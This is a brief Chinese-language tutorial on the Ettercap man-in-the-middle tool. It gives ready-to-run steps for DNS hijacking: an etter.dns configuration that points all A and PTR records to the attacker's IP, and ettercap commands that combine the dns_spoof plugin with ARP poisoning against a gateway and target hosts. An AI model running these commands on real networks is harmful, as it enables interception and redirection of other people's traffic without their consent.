简介
Ettercap最初是交换局域网的嗅探器,但在开发过程中,它获得了越来越多的功能,从而使其转变为强大而灵活的中间人攻击工具。它支持许多协议(甚至是加密协议)的主动和被动解剖,并包括许多用于网络和主机分析的功能。
常用参数
-T 文本模式( 通常情况下 -Tq一起使用)
-q安静模式
-G图形化模式
Dns劫持
命令行用法
首先设置etter.dns
vi /etc/ettercap/etter.dns
添加
* A [劫持者的ip]
* PTR [劫持者的ip]
然后执行以下任意命令
1.ettercap -Tq -i eth0 /网关// /目标主机// -P dns_spoof
2.ettercap -i eth0 -Tq -P dns_spoof -M arp:remote /// ///